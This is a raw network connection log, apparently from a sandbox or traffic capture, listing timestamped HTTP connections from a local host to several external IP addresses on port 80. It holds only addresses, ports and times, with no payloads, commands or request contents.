Nov 2, 2024 05:26:04.450757027 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:04.462033033 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:04.466953993 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467021942 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467075109 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467082977 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467124939 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467206001 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467214108 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467247009 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:04.467256069 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190457106 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190469027 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190479040 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190524101 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190524101 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.190536022 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190547943 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190558910 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190570116 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190576077 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.190579891 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190592051 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.190608025 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.190640926 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.195350885 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.195399046 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.195408106 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.195446014 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.228905916 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.228915930 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.229082108 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.309508085 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.309521914 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.309537888 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.309564114 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.309691906 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.309705973 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.309716940 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.309736967 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.309743881 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.309779882 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.310133934 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.310184956 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.310287952 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.310300112 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.310312986 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.310324907 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.310345888 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.310374022 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.311048985 CET	80	49789	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:05.311095953 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:05.973855972 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.044774055 CET	49802	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.049798012 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.049885988 CET	49802	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.058512926 CET	49802	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.063432932 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731293917 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731309891 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731340885 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731352091 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731358051 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731365919 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731375933 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.731461048 CET	49802	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.731518984 CET	49802	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.773415089 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:07.773504972 CET	49802	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.774404049 CET	49802	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:07.779258013 CET	80	49802	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:12.821238995 CET	49836	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:12.826153994 CET	80	49836	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:12.826232910 CET	49836	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:12.844213963 CET	49836	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:12.849044085 CET	80	49836	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:13.697709084 CET	80	49836	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:13.697984934 CET	80	49836	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:13.698035955 CET	49836	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:13.824251890 CET	80	49836	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:13.824419022 CET	49836	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:14.348692894 CET	49836	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:15.367157936 CET	49852	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:15.372014046 CET	80	49852	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:15.372096062 CET	49852	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:15.382471085 CET	49852	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:15.387900114 CET	80	49852	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:16.249629021 CET	80	49852	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:16.249644995 CET	80	49852	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:16.249711990 CET	49852	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:16.376729965 CET	80	49852	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:16.376898050 CET	49852	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:16.895591021 CET	49852	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:17.914104939 CET	49865	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:17.918958902 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.919055939 CET	49865	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:17.930027008 CET	49865	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:17.935005903 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935017109 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935031891 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935040951 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935080051 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935090065 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935106039 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935112953 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:17.935122013 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:18.796828985 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:18.796842098 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:18.796878099 CET	49865	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:18.923424006 CET	80	49865	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:18.923469067 CET	49865	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:19.442570925 CET	49865	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:20.460856915 CET	49879	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:20.465694904 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:20.465792894 CET	49879	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:20.472907066 CET	49879	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:20.477653027 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:21.324090004 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:21.324110985 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:21.324120045 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:21.324130058 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:21.324152946 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:21.324410915 CET	49879	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:21.450592041 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:21.452419996 CET	49879	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:21.453197002 CET	49879	80	192.168.2.4	161.97.142.144
Nov 2, 2024 05:26:21.457993984 CET	80	49879	161.97.142.144	192.168.2.4
Nov 2, 2024 05:26:26.476769924 CET	49913	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:26.481553078 CET	80	49913	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:26.481622934 CET	49913	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:26.495189905 CET	49913	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:26.499979973 CET	80	49913	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:27.226159096 CET	80	49913	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:27.228022099 CET	80	49913	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:27.228091955 CET	49913	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:28.004930973 CET	49913	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:29.023910999 CET	49925	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:29.028810978 CET	80	49925	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:29.028892040 CET	49925	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:29.039731979 CET	49925	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:29.044761896 CET	80	49925	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:29.779442072 CET	80	49925	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:29.781786919 CET	80	49925	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:29.781867027 CET	49925	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:30.554043055 CET	49925	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:31.570347071 CET	49940	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:31.575179100 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.575273991 CET	49940	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:31.586420059 CET	49940	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:31.591289997 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591308117 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591389894 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591398954 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591447115 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591454983 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591492891 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591501951 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:31.591511011 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:32.349487066 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:32.350747108 CET	80	49940	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:32.350794077 CET	49940	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:33.101430893 CET	49940	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:34.117319107 CET	49956	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:34.122275114 CET	80	49956	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:34.122349977 CET	49956	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:34.129363060 CET	49956	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:34.134216070 CET	80	49956	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:34.896770000 CET	80	49956	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:34.902729034 CET	80	49956	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:34.902812004 CET	49956	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:34.903701067 CET	49956	80	192.168.2.4	188.114.97.3
Nov 2, 2024 05:26:34.909406900 CET	80	49956	188.114.97.3	192.168.2.4
Nov 2, 2024 05:26:40.130232096 CET	49990	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:40.135024071 CET	80	49990	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:40.135096073 CET	49990	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:40.145973921 CET	49990	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:40.150736094 CET	80	49990	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:41.420646906 CET	80	49990	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:41.420670986 CET	80	49990	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:41.420681000 CET	80	49990	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:41.420698881 CET	80	49990	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:41.420728922 CET	49990	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:41.420773983 CET	49990	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:41.570930004 CET	80	49990	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:41.571063042 CET	49990	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:41.661200047 CET	49990	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:42.680602074 CET	50003	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:42.685497999 CET	80	50003	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:42.685575962 CET	50003	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:42.698375940 CET	50003	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:42.703171015 CET	80	50003	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:43.582433939 CET	80	50003	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:43.582451105 CET	80	50003	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:43.582463980 CET	80	50003	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:43.582472086 CET	80	50003	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:43.582588911 CET	50003	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:43.732238054 CET	80	50003	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:43.732309103 CET	50003	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:44.208076954 CET	50003	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:45.230010986 CET	50019	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:45.234874010 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.234945059 CET	50019	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:45.249924898 CET	50019	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:45.254909039 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.254975080 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.254983902 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.254992962 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.255026102 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.255034924 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.255043030 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.255139112 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:45.255147934 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:46.156958103 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:46.156971931 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:46.156989098 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:46.156999111 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:46.157048941 CET	50019	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:46.157078981 CET	50019	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:46.455539942 CET	80	50019	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:46.455604076 CET	50019	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:46.755330086 CET	50019	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:47.774383068 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:47.779397011 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:47.782717943 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:47.790350914 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:47.795208931 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.706985950 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707003117 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707011938 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707067966 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:48.707072973 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707083941 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707093954 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707103968 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707118988 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707130909 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707140923 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.707187891 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:48.707206011 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:48.856997967 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:48.857105970 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:48.858093023 CET	50023	80	192.168.2.4	194.58.112.174
Nov 2, 2024 05:26:48.862874031 CET	80	50023	194.58.112.174	192.168.2.4
Nov 2, 2024 05:26:53.888268948 CET	50024	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:53.893110991 CET	80	50024	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:53.893239975 CET	50024	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:53.903789997 CET	50024	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:53.908670902 CET	80	50024	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:54.590749025 CET	80	50024	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:54.590802908 CET	50024	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:55.411231041 CET	50024	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:55.416048050 CET	80	50024	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:56.430299997 CET	50025	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:56.435249090 CET	80	50025	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:56.436407089 CET	50025	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:56.472012043 CET	50025	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:56.476878881 CET	80	50025	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:57.136214018 CET	80	50025	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:57.136264086 CET	50025	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:57.990542889 CET	50025	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:57.995428085 CET	80	50025	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.144464016 CET	50026	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:59.149374008 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.149435997 CET	50026	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:59.198745012 CET	50026	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:26:59.203674078 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203684092 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203758001 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203767061 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203783035 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203790903 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203823090 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203866005 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.203875065 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.836669922 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:26:59.836718082 CET	50026	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:27:00.712274075 CET	50026	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:27:00.717138052 CET	80	50026	13.248.169.48	192.168.2.4
Nov 2, 2024 05:27:01.739269972 CET	50027	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:27:01.744128942 CET	80	50027	13.248.169.48	192.168.2.4
Nov 2, 2024 05:27:01.744194031 CET	50027	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:27:01.822622061 CET	50027	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:27:01.827512026 CET	80	50027	13.248.169.48	192.168.2.4
Nov 2, 2024 05:27:02.448338032 CET	80	50027	13.248.169.48	192.168.2.4
Nov 2, 2024 05:27:02.481882095 CET	80	50027	13.248.169.48	192.168.2.4
Nov 2, 2024 05:27:02.481982946 CET	50027	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:27:02.482814074 CET	50027	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:27:02.487579107 CET	80	50027	13.248.169.48	192.168.2.4
Nov 2, 2024 05:27:16.433748960 CET	50028	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:16.438553095 CET	80	50028	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:16.438635111 CET	50028	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:16.448836088 CET	50028	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:16.453681946 CET	80	50028	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:17.107820988 CET	80	50028	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:17.107839108 CET	80	50028	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:17.107850075 CET	80	50028	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:17.107858896 CET	80	50028	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:17.107898951 CET	50028	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:17.107958078 CET	50028	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:17.141171932 CET	80	50028	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:17.141388893 CET	50028	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:17.958224058 CET	50028	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:18.980351925 CET	50029	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:18.985204935 CET	80	50029	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:18.986438036 CET	50029	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:18.998394012 CET	50029	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:19.003494024 CET	80	50029	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:19.664345026 CET	80	50029	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:19.664359093 CET	80	50029	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:19.664369106 CET	80	50029	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:19.664374113 CET	80	50029	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:19.664499044 CET	50029	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:19.696821928 CET	80	50029	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:19.696930885 CET	50029	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:20.505085945 CET	50029	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:21.526803970 CET	50030	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:21.532840014 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.532915115 CET	50030	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:21.546464920 CET	50030	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:21.552334070 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552342892 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552350998 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552355051 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552364111 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552372932 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552592039 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552601099 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:21.552603960 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:22.189837933 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:22.189852953 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:22.189863920 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:22.189873934 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:22.189903021 CET	50030	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:22.189986944 CET	50030	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:22.221937895 CET	80	50030	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:22.221990108 CET	50030	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:23.051924944 CET	50030	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:24.070532084 CET	50031	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:24.075388908 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:24.075459957 CET	50031	80	192.168.2.4	162.240.81.18
